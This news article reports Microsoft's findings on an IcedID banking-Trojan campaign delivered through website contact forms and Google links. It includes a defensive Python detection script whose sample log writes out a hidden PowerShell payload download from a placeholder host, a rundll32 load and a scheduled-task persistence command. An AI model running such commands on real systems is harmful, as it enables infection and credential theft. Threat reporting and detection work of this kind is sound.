Malware-spreading criminals take advantage of the company’s official contact channel

According to reports, website contact forms and Google URLs are being used in an attack campaign to spread the IcedID banking Trojan. Microsoft has investigated the attacks and issued an alert.

The ‘contact form’ here refers to the ‘contact us’ form found on websites. It is the feature visitors use to reach site administrators, and attackers are said to be using it to send threatening messages such as: “Your company has stolen a copyrighted photo or picture, and we will pursue legal action against you.”

The message also includes a link labelled “Proof”. Clicking it leads to a Google page from which IcedID, also known as BokBot, is downloaded. IcedID (BokBot) is a malware loader that steals personal information.

Oddly, the attackers’ fake names all begin with the letters ‘mel’, such as Melanie or Meleena, and the fake e-mail addresses also begin with the letter m. MS researchers found the addresses [email protected] and [email protected]. No explanation for this pattern has been found yet.

A .JS file is extracted when the zip file behind the malicious link is decompressed. It creates a shell object and is run through WScript. That shell object launches PowerShell, which downloads the IcedID payload as a .DAT file. This file also contains a Cobalt Strike beacon in the form of a DLL, allowing the attackers to remotely monitor the victim’s computer.

While running various information-stealing commands, the attackers collect IP addresses and device information. At the same time, it disables SQLite in order to steal bank and financial-institution credentials from browser databases.

In the case of IcedID, the modules are downloaded only after a connection to the C&C server has been established. They include core modules for capturing and stealing banking credentials, as well as modules for stealing other types of data. It also uses the Task Scheduler to maintain persistence.
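The execution chain above (a .JS file run by WScript, PowerShell spawned from it to fetch a .DAT payload, the DLL loaded from that file, and a scheduled task for persistence) leaves a recognisable trail in process-creation telemetry. The following Python is an added illustration, not code from the article or from Microsoft; it scans constructed sample log lines in an assumed, simplified `parent_image|image|command_line` format and flags each stage. All paths, hostnames (`example.invalid`) and the export name `Init` are placeholders, not indicators from the campaign.

```python
"""Flag stages of the WScript -> PowerShell -> .DAT -> scheduled-task chain.

Added example (not the article's or Microsoft's code). The log format and
every path/hostname below are assumptions constructed for this illustration.
"""
import re

# Constructed sample telemetry: parent_image|image|command_line (not real data).
SAMPLE_LOG = """\
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wscript.exe|wscript.exe "C:\\Users\\alice\\Downloads\\proof\\document.js"
C:\\Windows\\System32\\wscript.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -w hidden -c "iwr http://example.invalid/stage.dat -OutFile $env:TEMP\\stage.dat"
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\rundll32.exe|rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\stage.dat,Init
C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe|C:\\Windows\\System32\\schtasks.exe|schtasks /create /sc minute /mo 30 /tn Updater /tr C:\\Users\\alice\\AppData\\Local\\Temp\\stage.exe
C:\\Windows\\explorer.exe|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|WINWORD.EXE report.docx
C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\schtasks.exe|schtasks /create /tn Maintenance /tr C:\\Windows\\System32\\cleanmgr.exe
"""

# Windows script hosts that run .js files.
SCRIPT_HOST = re.compile(r"\\[wc]script\.exe$", re.I)
# Locations a user (and therefore a downloaded archive) can write to.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|AppData\\Local\\Temp)\\", re.I)
# PowerShell download primitives worth pairing with a .dat target.
DOWNLOAD_VERBS = re.compile(r"iwr|invoke-webrequest|downloadfile|downloadstring", re.I)


def parse_line(line):
    """Split one constructed log line into its three fields."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent, "image": image, "cmdline": cmdline}


def classify(event):
    """Return the list of chain stages this single event matches (empty if benign)."""
    parent, image, cmd = event["parent"], event["image"], event["cmdline"]
    image_l = image.lower()
    findings = []
    if SCRIPT_HOST.search(image) and re.search(r"\.js\b", cmd, re.I) and USER_WRITABLE.search(cmd):
        findings.append("script host running .js from user-writable path")
    if SCRIPT_HOST.search(parent) and image_l.endswith("powershell.exe"):
        findings.append("PowerShell spawned by WScript/CScript")
    if image_l.endswith("powershell.exe") and re.search(r"\.dat\b", cmd, re.I) and DOWNLOAD_VERBS.search(cmd):
        findings.append("PowerShell downloading .dat payload")
    if image_l.endswith("rundll32.exe") and re.search(r"\.dat\b", cmd, re.I):
        findings.append("rundll32 loading .dat file as a DLL")
    if image_l.endswith("schtasks.exe") and re.search(r"/create", cmd, re.I) and USER_WRITABLE.search(cmd):
        findings.append("scheduled task pointing at user-writable path")
    return findings


def scan(log_text):
    """Return (image, findings) for every event that matched at least one stage."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        findings = classify(event)
        if findings:
            results.append((event["image"], findings))
    return results


if __name__ == "__main__":
    for image, findings in scan(SAMPLE_LOG):
        print(image)
        for f in findings:
            print("   -", f)
```

Each rule fires on its own, so a single line such as the PowerShell event yields two findings (its parent and its download target); correlating several stages on the same host within a short window is what separates this chain from a lone scripted download, and the benign `schtasks` and WINWORD lines show the user-writable-path condition keeping the rules quiet on ordinary activity.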

Anticipating that the sites would be taken down, the attackers set up an alternative route: a malicious link pointing to a Google User Content page that also hosted the malicious zip files.

A malicious message submitted through a site’s ‘contact us’ form is unlikely to be caught by e-mail security appliances, and recipients often have little reason to be suspicious. The form is an official channel for communication, and there have not been many attacks that abused it. Furthermore, since ordinary customers routinely approach the company through this channel, vigilance toward it is low.